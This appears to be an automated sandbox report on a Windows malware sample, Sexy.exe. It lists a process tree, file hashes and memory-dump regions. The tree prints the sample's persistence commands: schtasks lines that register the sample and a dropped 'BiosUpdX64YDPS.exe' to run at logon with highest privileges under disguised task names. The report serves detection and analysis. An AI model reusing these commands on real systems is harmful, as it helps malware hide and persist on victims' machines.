C:\Windows\Explorer.EXE (depth 1)
C:\Windows\Explorer.EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Sexy.exe (depth 2)
"C:\Users\Admin\AppData\Local\Temp\Sexy.exe"
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe (depth 3)
"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Sexy.exe" /rl HIGHEST /f
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe (depth 3)
"C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
"schtasks" /delete /tn "$sxr-mtsha" /f
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\63eIBINiSevA.bat" "
-
C:\Windows\SysWOW64\chcp.com (depth 5)
chcp 65001
-
C:\Windows\SysWOW64\PING.EXE (depth 5)
ping -n 10 localhost
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\Install.exe (depth 4)
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe (depth 4)
"SCHTASKS.exe" /create /tn "$77BiosUpdX64YDPS.exe" /tr "'C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe'" /sc onlogon /rl HIGHEST
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe (depth 3)
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe (depth 3)
"SCHTASKS.exe" /create /tn "$77Sexy.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Sexy.exe'" /sc onlogon /rl HIGHEST
- Creates scheduled task(s)
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
C:\Windows\system32\WerFault.exe -u -p 3668 -s 868
-
C:\Windows\system32\WerFault.exe (depth 2)
C:\Windows\system32\WerFault.exe -u -p 3668 -s 932
- Suspicious use of NtCreateProcessExOtherParentProcess
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
-
C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\ApplicationFrameHost.exe (depth 1)
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
-
C:\Windows\System32\InstallAgent.exe (depth 1)
C:\Windows\System32\InstallAgent.exe -Embedding
-
C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
-
C:\Windows\system32\WerFault.exe (depth 2)
C:\Windows\system32\WerFault.exe -u -p 4612 -s 712
-
C:\Windows\system32\WerFault.exe (depth 2)
C:\Windows\system32\WerFault.exe -u -p 4612 -s 652
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\63eIBINiSevA.bat
Filesize 271B
MD5 fda7f447461abb6207e9b3be3d64faac
SHA1 061ea146300a8ae5e960d08df6d5ed38d90519da
SHA256 a1cf09200dbb548929b714cad891b3dfa9445a03d088abe22cbc5edadc24e1c4
SHA512 682ef1b671990afe2dbcdc0193d1d5db32e6119e296cb918f0d90442059ba58f821927afa94fe9711d889a0295693084b1a0bc6fd9c49b0b64917f45649a71f8
-
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize 162KB
MD5 152e3f07bbaf88fb8b097ba05a60df6e
SHA1 c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256 a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$sxr\04-21-~1
Filesize 224B
MD5 76cbb4d23eb7879a8904c865883463ad
SHA1 88c57576fb292bd9407eaf793a6436210b532b2d
SHA256 eb2ce80614b48eb5cf19d760d5a1ad0ae142ec6536eb26c3566bec0f1ad6be5a
SHA512 a3b9cfea9d1db58df358a1da19aa7fd079e20257adc36292b6185dc986d4e3eb013eda3e81d3129fd2e0d3976b39942010886d0a570de9dfd43f860a578c5b04
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
Filesize 409KB
MD5 4c5faec89139e079202a5208d49ed5a0
SHA1 f26bf551e191af0dd01b5d39ae0c8489d94a877e
SHA256 bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
SHA512 5d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
-
C:\Windows\Temp\__PSScriptPolicyTest_zuchhkww.iup.ps1
Filesize 1B
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize 3KB
MD5 42d4b1d78e6e092af15c7aef34e5cf45
SHA1 6cf9d0e674430680f67260194d3185667a2bb77b
SHA256 c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512 d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 efe0903424c927d3611f8d8acd078b79
SHA1 22fda4e644f8fa0908493f40b930b1dff1755356
SHA256 79fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6
SHA512 8de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9
-
memory/216-52-0x00000277F0100000-0x00000277F012A000-memory.dmp
Filesize 168KB
-
memory/216-43-0x00000277D79E0000-0x00000277D79F0000-memory.dmp
Filesize 64KB
-
memory/216-65-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
Filesize 9.9MB
-
memory/216-66-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/216-67-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmp
Filesize 696KB
-
memory/216-54-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmp
Filesize 696KB
-
memory/216-26-0x00000277D79E0000-0x00000277D79F0000-memory.dmp
Filesize 64KB
-
memory/216-25-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
Filesize 9.9MB
-
memory/216-27-0x00000277D79E0000-0x00000277D79F0000-memory.dmp
Filesize 64KB
-
memory/216-28-0x00000277EFF90000-0x00000277EFFB2000-memory.dmp
Filesize 136KB
-
memory/216-31-0x00000277F0140000-0x00000277F01B6000-memory.dmp
Filesize 472KB
-
memory/216-53-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/364-127-0x000001D2413D0000-0x000001D2413FB000-memory.dmp
Filesize 172KB
-
memory/368-125-0x000001884A090000-0x000001884A0BB000-memory.dmp
Filesize 172KB
-
memory/428-50-0x0000000006750000-0x000000000675A000-memory.dmp
Filesize 40KB
-
memory/428-84-0x0000000073EE0000-0x00000000745CE000-memory.dmp
Filesize 6.9MB
-
memory/428-88-0x00000000051F0000-0x0000000005200000-memory.dmp
Filesize 64KB
-
memory/428-380-0x0000000073EE0000-0x00000000745CE000-memory.dmp
Filesize 6.9MB
-
memory/428-14-0x00000000051F0000-0x0000000005200000-memory.dmp
Filesize 64KB
-
memory/428-13-0x0000000073EE0000-0x00000000745CE000-memory.dmp
Filesize 6.9MB
-
memory/588-75-0x00000211C4E10000-0x00000211C4E35000-memory.dmp
Filesize 148KB
-
memory/588-78-0x00000211C4E40000-0x00000211C4E6B000-memory.dmp
Filesize 172KB
-
memory/588-112-0x00007FF868400000-0x00007FF868410000-memory.dmp
Filesize 64KB
-
memory/588-114-0x00007FF8A8415000-0x00007FF8A8416000-memory.dmp
Filesize 4KB
-
memory/588-109-0x00000211C4E40000-0x00000211C4E6B000-memory.dmp
Filesize 172KB
-
memory/588-76-0x00000211C4E40000-0x00000211C4E6B000-memory.dmp
Filesize 172KB
-
memory/648-129-0x00007FF868400000-0x00007FF868410000-memory.dmp
Filesize 64KB
-
memory/648-83-0x000001CEFF170000-0x000001CEFF19B000-memory.dmp
Filesize 172KB
-
memory/648-122-0x000001CEFF170000-0x000001CEFF19B000-memory.dmp
Filesize 172KB
-
memory/732-100-0x0000020FD4B70000-0x0000020FD4B9B000-memory.dmp
Filesize 172KB
-
memory/1000-102-0x000002036C1D0000-0x000002036C1FB000-memory.dmp
Filesize 172KB
-
memory/1000-165-0x00007FF8A8415000-0x00007FF8A8416000-memory.dmp
Filesize 4KB
-
memory/1084-1655-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/1084-1654-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2304-836-0x0000000000F20000-0x0000000000F3C000-memory.dmp
Filesize 112KB
-
memory/2400-366-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2400-460-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2440-983-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2440-1029-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2440-986-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmp
Filesize 696KB
-
memory/2960-1004-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2960-56-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize 32KB
-
memory/2960-59-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize 32KB
-
memory/2960-97-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2960-72-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize 32KB
-
memory/2960-61-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize 32KB
-
memory/2960-69-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/2960-71-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmp
Filesize 696KB
-
memory/2960-55-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize 32KB
-
memory/2960-57-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize 32KB
-
memory/3180-981-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmp
Filesize 696KB
-
memory/3180-969-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmp
Filesize 64KB
-
memory/3180-992-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
Filesize 9.9MB
-
memory/3180-994-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmp
Filesize 696KB
-
memory/3180-993-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/3180-856-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
Filesize 9.9MB
-
memory/3180-857-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmp
Filesize 64KB
-
memory/3180-862-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmp
Filesize 64KB
-
memory/3180-985-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmp
Filesize 64KB
-
memory/3180-899-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/3180-978-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/3180-949-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmp
Filesize 64KB
-
memory/3180-968-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
Filesize 9.9MB
-
memory/3272-575-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/3272-583-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp
Filesize 1.9MB
-
memory/3368-728-0x00007FF868400000-0x00007FF868410000-memory.dmp
Filesize 64KB
-
memory/4228-2-0x0000000005580000-0x0000000005A7E000-memory.dmp
Filesize 5.0MB
-
memory/4228-7-0x00000000061A0000-0x00000000061DE000-memory.dmp
Filesize 248KB
-
memory/4228-4-0x00000000051B0000-0x00000000051C0000-memory.dmp
Filesize 64KB
-
memory/4228-1-0x0000000073EE0000-0x00000000745CE000-memory.dmp
Filesize 6.9MB
-
memory/4228-3-0x00000000051C0000-0x0000000005252000-memory.dmp
Filesize 584KB
-
memory/4228-0-0x0000000000880000-0x00000000008EC000-memory.dmp
Filesize 432KB
-
memory/4228-5-0x0000000005260000-0x00000000052C6000-memory.dmp
Filesize 408KB
-
memory/4228-20-0x0000000073EE0000-0x00000000745CE000-memory.dmp
Filesize 6.9MB
-
memory/4228-6-0x0000000005DB0000-0x0000000005DC2000-memory.dmp
Filesize 72KB
-
memory/4992-877-0x000001AC6FCA0000-0x000001AC6FCB0000-memory.dmp
Filesize 64KB